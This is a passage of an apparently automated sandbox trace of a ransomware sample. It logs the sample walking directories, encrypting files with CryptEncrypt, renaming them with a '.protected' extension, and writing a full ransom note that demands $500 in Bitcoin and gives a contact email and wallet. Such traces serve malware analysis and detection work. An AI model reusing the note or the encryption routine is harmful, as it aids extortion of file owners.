hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0094.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0094.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\.." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.816] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.816] lstrcmpiW (lpString1="Content", lpString2="Windows") returned -1 [0094.816] lstrcmpiW (lpString1="Content", lpString2="Program Files") returned -1 [0094.816] lstrcmpiW (lpString1="Content", lpString2="Program Files (x86)") returned -1 [0094.817] lstrcmpiW (lpString1="Content", lpString2="$Recycle.bin") returned 1 [0094.817] lstrcmpiW (lpString1="Content", lpString2="System Volume Information") returned -1 [0094.817] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content") returned 72 [0094.817] lstrcmpW (lpString1="Content", lpString2=".") returned 1 [0094.817] lstrcmpW (lpString1="Content", lpString2="..") returned 1 [0094.817] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*") returned 74 [0094.817] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.817] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.817] lstrcmpiW 
(lpString1=".", lpString2="Program Files") returned -1 [0094.817] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.817] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.817] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.817] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.") returned 74 [0094.817] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.817] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.817] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.817] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.817] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\." 
(normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.817] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.817] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.817] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.817] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.817] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.817] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.817] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\..") returned 75 [0094.817] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.817] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.818] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.818] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.818] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.818] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\.." 
(normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.818] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Windows") returned -1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files") returned -1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files (x86)") returned -1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="$Recycle.bin") returned 1 [0094.818] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="System Volume Information") returned -1 [0094.818] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0094.818] StrStrIW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".protected") returned 0x0 [0094.818] lstrcmpW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="RESTORE_FILES.txt") returned -1 [0094.818] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.818] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.819] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0094.819] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0094.819] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0094.819] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".rar") returned 0x0 [0094.819] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 105 [0094.819] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".zip") returned 0x0 [0094.819] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x228, lpOverlapped=0x0) returned 1 [0094.820] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffdd8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.820] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x228, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x228, lpOverlapped=0x0) returned 1 [0094.820] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.820] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.820] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.820] CloseHandle (hObject=0x150) returned 1 [0094.820] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected") returned 115 [0094.820] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b2238aaccedc3f1ffe8e7eb5f575ec9.protected")) returned 1 [0094.823] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Windows") returned -1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files") returned -1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files (x86)") returned -1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="$Recycle.bin") returned 1 [0094.823] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="System Volume Information") returned -1 [0094.823] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0094.823] StrStrIW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".protected") returned 0x0 
[0094.823] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="RESTORE_FILES.txt") returned -1 [0094.823] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.823] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.824] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0094.824] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0094.824] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0094.824] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".rar") returned 0x0 [0094.824] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015") returned 105 [0094.824] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".zip") returned 0x0 [0094.824] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0094.824] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) 
returned 1 [0094.824] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x0, lpOverlapped=0x0) returned 1 [0094.824] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.824] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.825] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.825] CloseHandle (hObject=0x150) returned 1 [0094.825] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.protected") returned 115 [0094.825] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\94308059B57B3142E455B38A6EB92015.protected" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\94308059b57b3142e455b38a6eb92015.protected")) returned 1 [0094.825] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.826] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.826] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RESTORE_FILES.txt") returned 90 [0094.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.832] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.832] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.833] lstrlenA (lpString="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") returned 684 [0094.833] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.833] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.833] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, 
lpOverlapped=0x0) returned 1 [0094.833] CloseHandle (hObject=0x14c) returned 1 [0094.835] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="Windows") returned -1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="Program Files") returned -1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="Program Files (x86)") returned -1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="$Recycle.bin") returned 1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="System Volume Information") returned -1 [0094.835] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned 73 [0094.835] lstrcmpW (lpString1="MetaData", lpString2=".") returned 1 [0094.835] lstrcmpW (lpString1="MetaData", lpString2="..") returned 1 [0094.835] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*") returned 75 [0094.835] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.835] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.835] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.836] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.836] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.836] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.836] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.") returned 75 [0094.836] lstrcmpW (lpString1=".", lpString2=".") returned 0 
[0094.836] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.836] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.836] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.836] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.836] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.836] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.836] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.836] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.836] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.836] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\..") returned 76 [0094.836] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.836] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.836] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.836] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.837] CryptEncrypt (in: hKey=0x444cf8, 
hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.837] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Windows") returned -1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files") returned -1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files (x86)") returned -1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="$Recycle.bin") returned 1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="System Volume Information") returned -1 [0094.837] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0094.837] StrStrIW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".protected") returned 0x0 [0094.837] lstrcmpW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="RESTORE_FILES.txt") returned -1 [0094.837] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.844] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.844] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.845] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0094.845] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0094.845] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0094.845] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".rar") returned 0x0 [0094.845] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0094.845] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".zip") returned 0x0 [0094.846] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x104, lpOverlapped=0x0) returned 1 [0094.850] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.851] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x104, lpOverlapped=0x0) returned 1 [0094.851] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 